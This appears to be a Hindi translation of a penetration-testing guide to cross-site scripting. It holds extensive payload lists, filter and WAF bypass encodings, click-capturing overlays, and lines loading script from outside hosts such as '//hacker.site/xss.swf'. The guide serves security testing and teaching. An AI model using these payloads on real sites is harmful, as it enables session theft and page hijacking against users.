XSS (Cross Site Scripting)

यदि आप हैकिंग करियर में रुचि रखते हैं और अहैकेबल को हैक करना चाहते हैं - हम भर्ती कर रहे हैं! (चुस्त पोलिश लिखने और बोलने की आवश्यकता है).

Careers | stmcyber.com | penetration testingstmcyber.com

Methodology

जांचें कि क्या आपके द्वारा नियंत्रित कोई मान (पैरामीटर, पथ, हेडर्स?, कुकीज़?) HTML में प्रतिबिंबित हो रहा है या JS कोड द्वारा उपयोग किया जा रहा है।
उस संदर्भ को खोजें जहाँ यह प्रतिबिंबित/उपयोग किया जा रहा है।
यदि प्रतिबिंबित है
जांचें कौन से प्रतीक आप उपयोग कर सकते हैं और इस पर निर्भर करते हुए, पेलोड तैयार करें:
कच्चे HTML में:
क्या आप नए HTML टैग बना सकते हैं?
क्या आप javascript: प्रोटोकॉल समर्थित घटनाएँ या विशेषताएँ उपयोग कर सकते हैं?
क्या आप सुरक्षा को छल सकते हैं?
क्या HTML सामग्री को किसी क्लाइंट साइड JS इंजन (AngularJS, VueJS, Mavo...) द्वारा व्याख्या किया जा रहा है, तो आप क्लाइंट साइड टेम्पलेट इंजेक्शन का दुरुपयोग कर सकते हैं।
यदि आप HTML टैग नहीं बना सकते जो JS कोड को निष्पादित करते हैं, क्या आप डैंगलिंग मार्कअप - HTML स्क्रिप्टलेस इंजेक्शन का दुरुपयोग कर सकते हैं?
HTML टैग के अंदर:
क्या आप कच्चे HTML संदर्भ में बाहर निकल सकते हैं?
क्या आप नए घटनाएँ/विशेषताएँ बना सकते हैं जो JS कोड को निष्पादित करती हैं?
क्या वह विशेषता जिसमें आप फंसे हैं JS निष्पादन का समर्थन करती है?
क्या आप सुरक्षा को छल सकते हैं?
JavaScript कोड के अंदर:
क्या आप <script> टैग से बाहर निकल सकते हैं?
क्या आप स्ट्रिंग को छल सकते हैं और विभिन्न JS कोड निष्पादित कर सकते हैं?
क्या आपका इनपुट टेम्पलेट लिटरल्स `` में है?
क्या आप सुरक्षा को छल सकते हैं?
निष्पादित हो रहा है जावास्क्रिप्ट फ़ंक्शन
आप निष्पादित करने के लिए फ़ंक्शन का नाम दे सकते हैं। उदा।: ?callback=alert(1)
यदि उपयोग किया गया है:
आप एक DOM XSS का शोषण कर सकते हैं, ध्यान दें कि आपका इनपुट कैसे नियंत्रित है और यदि आपका नियंत्रित इनपुट किसी सिंक द्वारा उपयोग किया जा रहा है।

जब एक जटिल XSS पर काम कर रहे हों तो आपको यह जानने में दिलचस्पी मिल सकती है:

pageDebugging Client Side JS

प्रतिबिंबित मान

XSS का सफलतापूर्वक शोषण करने के लिए पहली चीज जो आपको ढूंढनी होगी वह है आपके द्वारा नियंत्रित कोई मान जो वेब पृष्ठ में प्रतिबिंबित हो रहा है।

बीच में प्रतिबिंबित: यदि आपको लगता है कि किसी पैरामीटर का मान या यहाँ तक कि पथ वेब पृष्ठ में प्रतिबिंबित हो रहा है तो आप एक प्रतिबिंबित XSS का शोषण कर सकते हैं।
संग्रहीत और प्रतिबिंबित: यदि आपको लगता है कि आपके द्वारा नियंत्रित किसी मान को सर्वर में सहेजा गया है और हर बार जब आप पृष्ठ तक पहुँचते हैं तो यह प्रतिबिंबित होता है तो आप एक संग्रहीत XSS का शोषण कर सकते हैं।
JS के माध्यम से पहुँचा गया: यदि आपको लगता है कि आपके द्वारा नियंत्रित किसी मान का उपयोग JS का उपयोग करके किया जा रहा है तो आप एक DOM XSS का शोषण कर सकते हैं।

संदर्भ

XSS का शोषण करने की कोशिश करते समय पहली चीज जो आपको जाननी होगी वह है आपका इनपुट कहाँ प्रतिबिंबित हो रहा है। संदर्भ के आधार पर, आप विभिन्न तरीकों पर विभिन्न तरीकों से विचारात्मक JS कोड निष्पादित कर सकेंगे।

कच्चे HTML

यदि आपका इनपुट कच्चे HTML पृष्ठ पर प्रतिबिंबित है तो आपको कुछ HTML टैग का दुरुपयोग करने की आवश्यकता होगी ताकि आप JS कोड को निष्पादित कर सकें: <img , <iframe , <svg , <script ... ये कुछ संभावित HTML टैग हैं जिन्हें आप उपयोग कर सकते हैं। इसके अलावा, क्लाइंट साइड टेम्पलेट इंजेक्शन को ध्यान में रखें।

HTML टैग विशेषता के अंदर

यदि आपका इनपुट किसी टैग की विशेषता के मान में प्रतिबिंबित है तो आप कोशिश कर सकते हैं:

विशेषता और टैग से बाहर निकलने के लिए (तो फिर आप कच्चे HTML में होंगे) और नए HTML टैग को दुरुपयोग करने के लिए: "><img [...]
यदि आप विशेषता से बाहर निकल सकते हैं लेकिन टैग से नहीं (> कोडित या हटाया गया है), टैग के आधार पर आप एक घटना बना सकते हैं जो JS कोड को निष्पादित करती है: " autofocus onfocus=alert(1) x="
यदि आप विशेषता से बाहर नहीं निकल सकते हैं (" कोडित या हटाया गया है), तो आपके इनपुट के आधार पर निर्भर करता है कि किस विशेषता में आपका मान प्रतिबिंबित हो रहा है क्या आप सभी मान या केवल कुछ हिस्सा नियंत्रित करते हैं आप इसका दुरुपयोग कर सकेंगे। उदाहरण के लिए, यदि आप onclick= जैसी घटना को नियंत्रित करते हैं तो आप इसे अर्बिट्रे कोड निष्पादित करने के लिए कर सकते हैं जब यह क्लिक किया जाता है। एक और दिलचस्प उदाहरण है विशेषता href, जहाँ आप javascript: प्रोटोकॉल का उपयोग करके अर्बिट्रे कोड निष्पादित कर सकते हैं: href="javascript:alert(1)"
यदि आपका इनपुट "अनउपयोगी टैगों" के अंदर प्रतिबिंबित है तो आप accesskey ट्रिक का प्रयोग कर सकते हैं वल्न का दुरुपयोग करने के लिए (इसे शोषण करने के लिए आपको किसी प्रकार के सोशल इंजीनियर की आवश्यकता होगी): " accesskey="x" onclick="alert(1)" x="

अ

<div ng-app>
<strong class="ng-init:constructor.constructor('alert(1)')()">aaa</strong>
</div>

जावास्क्रिप्ट कोड के अंदर

इस मामले में आपका इनपुट <script> [...] </script> टैग्स के बीच या एक HTML पेज के अंदर, एक .js फ़ाइल के अंदर या javascript: प्रोटोकॉल का उपयोग करके एक विशेषता के अंदर प्रतिबिंबित होता है:

अगर <script> [...] </script> टैग्स के बीच प्रतिबिंबित है, तो यदि आपका इनपुट किसी भी प्रकार के कोट्स के अंदर है, तो आप </script> इंजेक्ट करने का प्रयास कर सकते हैं और इस संदर्भ से बाहर निकल सकते हैं। यह काम करता है क्योंकि ब्राउज़र पहले HTML टैग्स को पार्स करेगा और फिर सामग्री, इसलिए, यह नोटिस नहीं करेगा कि आपका इंजेक्टेड </script> टैग HTML कोड के अंदर है।
अगर JS स्ट्रिंग के अंदर प्रतिबिंबित है और पिछला ट्रिक काम नहीं कर रहा है तो आपको स्ट्रिंग से बाहर निकलना, अपना कोड चलाना और जेएस कोड पुनर्निर्माण करने की आवश्यकता होगी (यदि कोई त्रुटि है, तो यह नहीं चलाया जाएगा):
'-alert(1)-'
';-alert(1)//
\';alert(1)//
यदि टेम्पलेट लिटरल्स के अंदर प्रतिबिंबित है तो आप ${ ... } सिंटेक्स का उपयोग करके जेएस व्यक्तियों को समाहित कर सकते हैं: var greetings = `Hello, ${alert(1)}`
यूनिकोड इंकोड वैध जावास्क्रिप्ट कोड लिखने के लिए काम करता है:

\u{61}lert(1)
\u0061lert(1)
\u{0061}lert(1)

जावास्क्रिप्ट होइस्टिंग

जावास्क्रिप्ट होइस्टिंग एक अवसर को संदर्भित करता है जहाँ फ़ंक्शन, वेरिएबल्स या क्लासेस की घोषणा की जा सकती हैं उनके उपयोग के बाद, ताकि आप XSS के स्थितियों का दुरुपयोग कर सकें जहाँ अप्रकटित वेरिएबल्स या फ़ंक्शन्स का उपयोग हो रहा है। अधिक जानकारी के लिए निम्नलिखित पृष्ठ की जाँच करें:

pageJS Hoisting

जावास्क्रिप्ट फ़ंक्शन

कई वेब पृष्ठों में एंडपॉइंट्स होते हैं जो किसी फ़ंक्शन का नाम पैरामीटर के रूप में स्वीकार करते हैं। जंगल में देखने के लिए एक सामान्य उदाहरण यह है: ?callback=callbackFunc।

यदि कुछ सीधे उपयोगकर्ता द्वारा दिया गया किसी चीज को निष्पादित करने की कोशिश कर रहा है, तो जानने का एक अच्छा तरीका है पैरामीटर मान को संशोधित करना (उदाहरण के लिए 'वलनरेबल' में) और त्रुटियों के लिए कंसोल में देखने के लिए।

यदि यह वलनरेबल है, तो आप एलर्ट को ट्रिगर कर सकते हैं बस इस मान को भेजकर: ?callback=alert(1)। हालांकि, यह बहुत सामान्य है कि यह एंडपॉइंट्स सामग्री की पुष्टि करें केवल अक्षर, संख्याएँ, डॉट्स और अंडरस्कोर्स ([\w\._]) को ही अनुमति देने के लिए।

हालांकि, उस सीमा के साथ भी कुछ क्रियाएँ करना संभव है। यह इसलिए है क्योंकि आप उस मान्य वर्णों का उपयोग कर सकते हैं जो DOM में किसी भी तत्व तक पहुंचने के लिए किया जा सकता है।

firstElementChild
lastElementChild
nextElementSibiling
lastElementSibiling
parentElement

आप यह भी प्रयास कर सकते हैं कि जावास्क्रिप्ट फ़ंक्शन को ट्रिगर किया जाए: obj.sales.delOrders.

हालांकि, सामान्यत: इस तरह के फ़ंक्शन को निष्पादित करने वाले एंडपॉइंट्स दिखाए गए होते हैं जिनमें कोई दिलचस्प DOM नहीं होता है, एक ही मूल स्रोत में अन्य पृष्ठ अधिक दिलचस्प DOM रखेंगे ताकि अधिक क्रियाएँ की जा सकें।

इसलिए, इस विकल्प का दुरुपयोग करने के लिए एक विभिन्न DOM में यह संक्रमण विकसित किया गया था:

pageSOME - Same Origin Method Execution

DOM

यहाँ JS कोड है जो कुछ डेटा का असुरक्षित रूप से उपयोग कर रहा है जैसे location.href। एक हमलावर, इसका दुरुपयोग करके विचारहीन JS कोड को निष्पादित किया जा सकता है।

pageDOM XSS

सार्वभौमिक XSS

इस प्रकार के XSS को कहीं भी पाया जा सकता है। ये केवल एक वेब एप्लिकेशन के ग्राहक शोषण पर नहीं निर्भर करते हैं बल्कि किसी भी संदर्भ पर। इस प्रकार के अर्बिट्रे जावास्क्रिप्ट निष्पादन को यहाँ RCE प्राप्त करने के लिए दुरुपयोग किया जा सकता है, ग्राहकों और सर्वरों में किसी भी फ़ाइल को पढ़ने के लिए, और अधिक। कुछ उदाहरण:

pageServer Side XSS (Dynamic PDF)pageElectron Desktop Apps

WAF बायपास इनकोडिंग इमेज

रॉ एचटीएमएल के अंदर इंजेक्शन

जब आपका इनपुट एचटीएमएल पेज के अंदर प्रतिबिंबित होता है या आप इस संदर्भ में एचटीएमएल कोड भाग सकते हैं, तो पहली बात जो आपको करनी चाहिए वह है कि आप नए टैग बनाने के लिए < का दुरुपयोग कर सकते हैं: बस उस वर्ण को प्रतिबिंबित करने का प्रयास करें और देखें कि यह एचटीएमएल इंकोड हो रहा है या हटाया जा रहा है या यदि यह परिवर्तन के बिना प्रतिबिंबित हो रहा है। केवल इस अंतिम मामले में आप इस मामले का दुरुपयोग कर सकेंगे। इस मामले में और यदि कोई काले/सफेद सूचीकरण का उपयोग नहीं होता है, तो आप पेलोड्स का उपयोग कर सकते हैं:

<script>alert(1)</script>
<img src=x onerror=alert(1) />
<svg onload=alert('XSS')>

लेकिन, अगर टैग/विशेषताएँ काली/सफेद सूचीबद्ध की जा रही हैं, तो आपको ब्रूट-फोर्स करने की आवश्यकता होगी कि आप कौन से टैग बना सकते हैं। जब आपने पता लगा लिया है कि कौन से टैग अनुमत हैं, तो आपको मिले वैध टैग्स के अंदर विशेषताएँ/घटनाएँ ब्रूट-फोर्स करनी होगी ताकि आप संदर्भ में हमला कैसे कर सकते हैं।

टैग/घटनाएँ ब्रूट-फोर्स

https://portswigger.net/web-security/cross-site-scripting/cheat-sheet पर जाएं और Copy tags to clipboard पर क्लिक करें। फिर, उन्हें सभी Burp intruder का उपयोग करके भेजें और जांचें कि क्या कोई टैग WAF द्वारा दुर्भाग्यपूर्ण नहीं माना गया है। जब आपने पता लगा लिया है कि आप कौन से टैग उपयोग कर सकते हैं, तो आप सभी घटनाएँ ब्रूट-फोर्स कर सकते हैं (उसी वेब पृष्ठ पर Copy events to clipboard पर क्लिक करें और पहले के तरीके का पालन करें)।

कस्टम टैग

अगर आपने कोई वैध HTML टैग नहीं पाया, तो आप एक कस्टम टैग बनाने की कोशिश कर सकते हैं और onfocus विशेषता के साथ JS कोड को निष्पादित कर सकते हैं। XSS अनुरोध में, आपको पृष्ठ को उस वस्तु पर ध्यान केंद्रित करने और कोड निष्पादित करने के लिए URL को # के साथ समाप्त करने की आवश्यकता होगी:

/?search=<xss+id%3dx+onfocus%3dalert(document.cookie)+tabindex%3d1>#x

ब्लैकलिस्ट बाईपास

यदि किसी प्रकार की ब्लैकलिस्ट का उपयोग किया जा रहा है तो आप कुछ मूर्ख ट्रिक्स के साथ इसे बाईपास करने का प्रयास कर सकते हैं:

//Random capitalization
<script> --> <ScrIpT>
<img --> <ImG

//Double tag, in case just the first match is removed
<script><script>
<scr<script>ipt>
<SCRscriptIPT>alert(1)</SCRscriptIPT>

//You can substitude the space to separate attributes for:
/
/*%00/
/%00*/
%2F
%0D
%0C
%0A
%09

//Unexpected parent tags
<svg><x><script>alert('1'&#41</x>

//Unexpected weird attributes
<script x>
<script a="1234">
<script ~~~>
<script/random>alert(1)</script>
<script      ///Note the newline
>alert(1)</script>
<scr\x00ipt>alert(1)</scr\x00ipt>

//Not closing tag, ending with " <" or " //"
<iframe SRC="javascript:alert('XSS');" <
<iframe SRC="javascript:alert('XSS');" //

//Extra open
<<script>alert("XSS");//<</script>

//Just weird an unexpected, use your imagination
<</script/script><script>
<input type=image src onerror="prompt(1)">

//Using `` instead of parenthesis
onerror=alert`1`

//Use more than one
<<TexTArEa/*%00//%00*/a="not"/*%00///AutOFocUs////onFoCUS=alert`1` //

लंबाई बाईपास (छोटे XSSs)

विभिन्न वातावरणों के लिए और छोटे XSS पेडलोड यहाँ पाया जा सकता है और यहाँ.

<!-- Taken from the blog of Jorge Lajara -->
<svg/onload=alert``>
<script src=//aa.es>
<script src=//℡㏛.pw>

Click XSS - Clickjacking

यदि वैयक्तिकता को उत्पीड़ित करने के लिए उपयोगकर्ता को एक लिंक या एक फॉर्म पर क्लिक करने की आवश्यकता है तो आप Clickjacking का दुरुपयोग कर सकते हैं (यदि पृष्ठ भेद्य है)।

असंभव - डैंगलिंग मार्कअप

यदि आप सिर्फ यह सोचते हैं कि एक HTML टैग बनाना जिसमें एक विशेषता हो जो जेएस कोड को क्रियाशील करने के लिए असंभव है, तो आपको Danglig Markup की जांच करनी चाहिए क्योंकि आप जेएस कोड क्रियाशील किए बिना विशेषता का दुरुपयोग कर सकते हैं।

HTML टैग के अंदर इंजेक्शन

टैग के अंदर/विशेषता मान से बाहर निकलना

यदि आप एक HTML टैग के अंदर हैं, तो पहली चीज जो आप कर सकते हैं वह है टैग से बाहर निकलना और पिछले खंड में उल्लिखित कुछ तकनीकों का उपयोग करना जो जेएस कोड को क्रियाशील करने के लिए है। यदि आप टैग से बाहर नहीं निकल सकते, तो आप टैग के अंदर नए विशेषताएँ बना सकते हैं जिससे जेएस कोड को क्रियाशील करने का प्रयास कर सकते हैं, उदाहरण के लिए कुछ पेयलोड का उपयोग करके (ध्यान दें कि इस उदाहरण में डबल कोटेशन का उपयोग विशेषता से बाहर निकलने के लिए किया गया है, यदि आपका इनपुट सीधे रूप से टैग के अंदर प्रतिबिम्बित है तो आपको उन्हें आवश्यक नहीं होगा):

" autofocus onfocus=alert(document.domain) x="
" onfocus=alert(1) id=x tabindex=0 style=display:block>#x #Access http://site.com/?#x t

स्टाइल इवेंट्स

<p style="animation: x;" onanimationstart="alert()">XSS</p>
<p style="animation: x;" onanimationend="alert()">XSS</p>

#ayload that injects an invisible overlay that will trigger a payload if anywhere on the page is clicked:
<div style="position:fixed;top:0;right:0;bottom:0;left:0;background: rgba(0, 0, 0, 0.5);z-index: 5000;" onclick="alert(1)"></div>
#moving your mouse anywhere over the page (0-click-ish):
<div style="position:fixed;top:0;right:0;bottom:0;left:0;background: rgba(0, 0, 0, 0.0);z-index: 5000;" onmouseover="alert(1)"></div>

विशेषता के अंदर

यदि आप विशेषता से बाहर निकल नहीं सकते हैं (" को एन्कोड या हटाया जा रहा है), तो भले ही आपके पास कौन सी विशेषता है जिसमें आपका मान प्रतिबिम्बित हो रहा है, क्या आप सभी मान को नियंत्रित करते हैं या केवल एक हिस्सा है, आप इसका दुरुपयोग कर सकेंगे। उदाहरण के लिए, यदि आप onclick= जैसी घटना को नियंत्रित करते हैं तो आप इसे क्लिक करने पर विचारहीन कोड का निष्पादन करने के लिए सक्षम होंगे। एक और दिलचस्प उदाहरण है विशेषता href, जहां आप javascript: प्रोटोकॉल का उपयोग करके विचारहीन कोड का निष्पादन कर सकते हैं: href="javascript:alert(1)"

HTML एन्कोडिंग/URL एन्कोड का उपयोग करके घटना के अंदर बायपास

HTML टैग विशेषताओं के मान के भीतर HTML एन्कोडित वर्ण रनटाइम पर डिकोड होते हैं। इसलिए कुछ इस प्रकार का मान्य होगा (पेलोड बोल्ड में है): <a id="author" href="http://none" onclick="var tracker='http://foo?'-alert(1)-'';">Go Back </a>

ध्यान दें कि किसी भी प्रकार का HTML एन्कोड मान्य है:

//HTML entities
&apos;-alert(1)-&apos;
//HTML hex without zeros
&#x27-alert(1)-&#x27
//HTML hex with zeros
&#x00027-alert(1)-&#x00027
//HTML dec without zeros
&#39-alert(1)-&#39
//HTML dec with zeros
&#00039-alert(1)-&#00039

<a href="javascript:var a='&apos;-alert(1)-&apos;'">a</a>
<a href="&#106;avascript:alert(2)">a</a>
<a href="jav&#x61script:alert(3)">a</a>

ध्यान दें कि URL एन्कोड भी काम करेगा:

<a href="https://example.com/lol%22onmouseover=%22prompt(1);%20img.png">Click</a>

यूनिकोड इनकोड का उपयोग करके इनसाइड इवेंट को बायपास करें

//For some reason you can use unicode to encode "alert" but not "(1)"
<img src onerror=\u0061\u006C\u0065\u0072\u0074(1) />
<img src onerror=\u{61}\u{6C}\u{65}\u{72}\u{74}(1) />

विशेष प्रोटोकॉल आवश्यकता के भीतर

वहाँ आप कुछ स्थानों पर javascript: या data: प्रोटोकॉल का उपयोग कर सकते हैं किसी भी JS कोड को क्रियाशील करने के लिए। कुछ में उपयोगकर्ता इंटरैक्शन की आवश्यकता होगी और कुछ में नहीं।

javascript:alert(1)
JavaSCript:alert(1)
javascript:%61%6c%65%72%74%28%31%29 //URL encode
javascript&colon;alert(1)
javascript&#x003A;alert(1)
javascript&#58;alert(1)
&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3aalert(1)
java        //Note the new line
script:alert(1)

data:text/html,<script>alert(1)</script>
DaTa:text/html,<script>alert(1)</script>
data:text/html;charset=iso-8859-7,%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3c%2f%73%63%72%69%70%74%3e
data:text/html;charset=UTF-8,<script>alert(1)</script>
data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=
data:text/html;charset=thing;base64,PHNjcmlwdD5hbGVydCgndGVzdDMnKTwvc2NyaXB0Pg
data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==

जगहें जहाँ आप इन प्रोटोकॉल को इंजेक्ट कर सकते हैं

सामान्य रूप से javascript: प्रोटोकॉल को किसी भी टैग में उपयोग किया जा सकता है जो विशेषता href को स्वीकार करता है और अधिकांश टैग में उपयोग किया जा सकता है जो विशेषता src को स्वीकार करता है (लेकिन <img नहीं)

<a href="javascript:alert(1)">
<a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=">
<form action="javascript:alert(1)"><button>send</button></form>
<form id=x></form><button form="x" formaction="javascript:alert(1)">send</button>
<object data=javascript:alert(3)>
<iframe src=javascript:alert(2)>
<embed src=javascript:alert(1)>

<object data="data:text/html,<script>alert(5)</script>">
<embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik7PC9zY3JpcHQ+" type="image/svg+xml" AllowScriptAccess="always"></embed>
<embed src="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg=="></embed>
<iframe src="data:text/html,<script>alert(5)</script>"></iframe>

//Special cases
<object data="//hacker.site/xss.swf"> .//https://github.com/evilcos/xss.swf
<embed code="//hacker.site/xss.swf" allowscriptaccess=always> //https://github.com/evilcos/xss.swf
<iframe srcdoc="<svg onload=alert(4);>">

अन्य उपाय छलावा

इस मामले में HTML इन्कोडिंग और पिछले खंड से यूनिकोड इन्कोडिंग ट्रिक भी मान्य है क्योंकि आप एक विशेषता के अंदर हैं।

<a href="javascript:var a='&apos;-alert(1)-&apos;'">

इसके अतिरिक्त, इन मामलों के लिए एक अच्छा तरीका है: यदि आपका इनपुट javascript:... के अंदर URL कोड किया जा रहा है, तो यह इसे निष्पादित होने से पहले URL डीकोड हो जाएगा। इसलिए, यदि आपको स्ट्रिंग से एकल उद्धरण का उपयोग करके बाहर निकलने की आवश्यकता है और आप देखते हैं कि यह URL कोड किया जा रहा है, तो याद रखें कि यह मायने नहीं रखता है, यह निष्पादन समय में एकल उद्धरण के रूप में व्याख्या किया जाएगा।

&apos;-alert(1)-&apos;
%27-alert(1)-%27
<iframe src=javascript:%61%6c%65%72%74%28%31%29></iframe>

ध्यान दें कि यदि आप कोई URLencode + HTMLencode का उपयोग करने की कोशिश करते हैं किसी भी क्रम में पेलोड को एन्कोड करने के लिए, तो यह काम नहीं करेगा, लेकिन आप पेलोड के अंदर उन्हें मिश्रित कर सकते हैं।

javascript: के साथ हेक्स और ऑक्टल एन्कोड का उपयोग करें

आप iframe के src विशेषता के अंदर हेक्स और ऑक्टल एन्कोड का उपयोग कर सकते हैं (कम से कम) JS को निष्पादित करने के लिए HTML टैग घोषित करने के लिए:

//Encoded: <svg onload=alert(1)>
// This WORKS
<iframe src=javascript:'\x3c\x73\x76\x67\x20\x6f\x6e\x6c\x6f\x61\x64\x3d\x61\x6c\x65\x72\x74\x28\x31\x29\x3e' />
<iframe src=javascript:'\74\163\166\147\40\157\156\154\157\141\144\75\141\154\145\162\164\50\61\51\76' />

//Encoded: alert(1)
// This doesn't work
<svg onload=javascript:'\x61\x6c\x65\x72\x74\x28\x31\x29' />
<svg onload=javascript:'\141\154\145\162\164\50\61\51' />

रिवर्स टैब नैबिंग

<a target="_blank" rel="opener"

यदि आप किसी भी URL को एक विषयर्थी <a href= टैग में इंजेक्ट कर सकते हैं जो target="_blank" और rel="opener" विशेषताएं सम्मिलित करता है, तो इस व्यवहार का शोध करने के लिए निम्नलिखित पृष्ठ की जाँच करें:

pageReverse Tab Nabbing

ईवेंट हैंडलर्स बायपास

सबसे पहले उपयोगी "on" ईवेंट हैंडलर्स के लिए इस पृष्ठ की जाँच करें (https://portswigger.net/web-security/cross-site-scripting/cheat-sheet)। यदि किसी काल सूची द्वारा आपको इन ईवेंट हैंडलर्स को निर्मित करने से रोका जा रहा है, तो आप निम्नलिखित बायपास को प्रयास कर सकते हैं:

<svg onload%09=alert(1)> //No safari
<svg %09onload=alert(1)>
<svg %09onload%20=alert(1)>
<svg onload%09%20%28%2c%3b=alert(1)>

//chars allowed between the onevent and the "="
IExplorer: %09 %0B %0C %020 %3B
Chrome: %09 %20 %28 %2C %3B
Safari: %2C %3B
Firefox: %09 %20 %28 %2C %3B
Opera: %09 %20 %2C %3B
Android: %09 %20 %28 %2C %3B

"अउपयोगी टैग" में XSS (छिपे हुए इनपुट, लिंक, कैनोनिकल, मेटा)

यहाँ से अब छिपे हुए इनपुट का दुरुपयोग करना संभव है:

<button popvertarget="x">Click me</button>
<input type="hidden" value="y" popover id="x" onbeforetoggle=alert(1)>

और मेटा टैग्स में:

<!-- Injection inside meta attribute-->
<meta name="apple-mobile-web-app-title" content=""Twitter popover id="newsletter" onbeforetoggle=alert(2) />
<!-- Existing target-->
<button popovertarget="newsletter">Subscribe to newsletter</button>
<div popover id="newsletter">Newsletter popup</div>

From यहाँ: आप एक छिपे हुए विशेषता के अंदर एक XSS पेलोड को क्रियान्वित कर सकते हैं, प्रदान कि आप विक्टिम को कुंजी संयोजन दबाने के लिए राजी कर सकें। फ़ायरफ़ॉक्स Windows/Linux पर कुंजी संयोजन ALT+SHIFT+X है और OS X पर यह CTRL+ALT+X है। आप पहुंच कुंजी विशेषता में एक विभिन्न कुंजी का उपयोग करके एक विभिन्न कुंजी संयोजन निर्दिष्ट कर सकते हैं। यहाँ वेक्टर है:

<input type="hidden" accesskey="X" onclick="alert(1)">

XSS पेलोड कुछ इस तरह होगा: " accesskey="x" onclick="alert(1)" x="

ब्लैकलिस्ट बायपास

कई तरह के एन्कोडिंग के साथ छल का पता इस खंड में पहले ही खोल दिया गया था। जानने के लिए वापस जाएं कि आप कहां उपयोग कर सकते हैं:

HTML एन्कोडिंग (HTML टैग)
यूनिकोड एन्कोडिंग (मान्य JS कोड हो सकता है): \u0061lert(1)
URL एन्कोडिंग
हेक्स और ऑक्टल एन्कोडिंग
डेटा एन्कोडिंग

HTML टैग और विशेषताएँ के लिए बायपास

पिछले खंड के ब्लैकलिस्ट बायपास पढ़ें।

JavaScript कोड के लिए बायपास

अगले खंड के जेवास्क्रिप्ट बायपास ब्लैकलिस्ट को पढ़ें।

CSS-गैजेट्स

अगर आपने वेब के बहुत छोटे हिस्से में XSS पाया है जिसमें किसी प्रकार की इंटरैक्शन की आवश्यकता है (शायद फूटर में एक छोटे से लिंक के साथ onmouseover तत्व), तो आप तत्व का जगह बदलने का प्रयास कर सकते हैं ताकि लिंक फायर होने की संभावनाएं अधिक हों।

उदाहरण के लिए, आप तत्व में कुछ स्टाइलिंग जोड़ सकते हैं जैसे: position: fixed; top: 0; left: 0; width: 100%; height: 100%; background-color: red; opacity: 0.5

लेकिन, अगर WAF स्टाइल विशेषता को फ़िल्टर कर रहा है, तो आप CSS स्टाइलिंग गैजेट्स का उपयोग कर सकते हैं, तो अगर आपको मिलता है, उदाहरण के लिए

.test {display:block; color: blue; width: 100%}

और

#someid {top: 0; font-family: Tahoma;}

अब आप हमारे लिंक को संशोधित कर सकते हैं और इसे नीचे लाने के लिए

<a href="" id=someid class=test onclick=alert() a="">

यह ट्रिक https://medium.com/@skavans_/improving-the-impact-of-a-mouse-related-xss-with-styling-and-css-gadgets-b1e5dec2f703 से ली गई थी।

जावास्क्रिप्ट कोड के भीतर इंजेक्शन

इन मामलों में आपका इनपुट एक .js फ़ाइल के जेएस कोड के भीतर या <script>...</script> टैग के बीच या उन HTML घटनाओं के बीच होने वाला है जो जेएस कोड को निष्पादित कर सकती हैं या उन विशेषताओं के बीच जो javascript: प्रोटोकॉल को स्वीकार करती हैं।

<script> टैग को बचाना

यदि आपका कोड <script> [...] var input = 'reflected data' [...] </script> के भीतर डाला गया है तो आप आसानी से <script> टैग को बचा सकते हैं:

</script><img src=1 onerror=alert(document.domain)>

नोट करें कि इस उदाहरण में हमने एकल उद्धरण को भी बंद नहीं किया है। यह इसलिए है क्योंकि HTML पार्सिंग पहले ब्राउज़र द्वारा किया जाता है, जिसमें पृष्ठ तत्वों की पहचान की जाती है, स्क्रिप्ट के ब्लॉक भी शामिल हैं। जावास्क्रिप्ट का पार्सिंग इसे समझने और निष्पादित करने के लिए केवल बाद में किया जाता है।

जेएस कोड के अंदर

यदि <> को सैनिटाइज किया जा रहा है तो आप फिर भी स्ट्रिंग को बचाने कर सकते हैं जहां आपका इनपुट स्थित है और विविध जेएस को निष्पादित कर सकते हैं। यह महत्वपूर्ण है कि जेएस की सिंटेक्स को सही करें, क्योंकि यदि कोई भी त्रुटियाँ होती हैं, तो जेएस कोड नहीं निष्पादित होगा:

'-alert(document.domain)-'
';alert(document.domain)//
\';alert(document.domain)//

टेम्पलेट लिटरल्स ``

स्ट्रिंग्स बनाने के लिए सिंगल और डबल कोट्स के अलावा JS बैकटिक्स `` को भी स्वीकार करता है। इसे टेम्पलेट लिटरल्स के रूप में जाना जाता है क्योंकि ये ${ ... } सिंटेक्स का उपयोग करके एम्बेडेड JS एक्सप्रेशन्स को अनुमति देते हैं। इसलिए, अगर आपको लगता है कि आपका इनपुट JS स्ट्रिंग के अंदर रिफ्लेक्ट हो रहा है जो बैकटिक्स का उपयोग कर रहा है, तो आप ${ ... } सिंटेक्स का दुरुपयोग करके विविध JS कोड को निषेधित कर सकते हैं:

इसे इस प्रकार से दुरुपयोग किया जा सकता है:

`${alert(1)}`
`${`${`${`${alert(1)}`}`}`}`

// This is valid JS code, because each time the function returns itself it's recalled with ``
function loop(){return loop}
loop``````````````

एन्कोडेड कोड निष्पादन

<script>\u0061lert(1)</script>
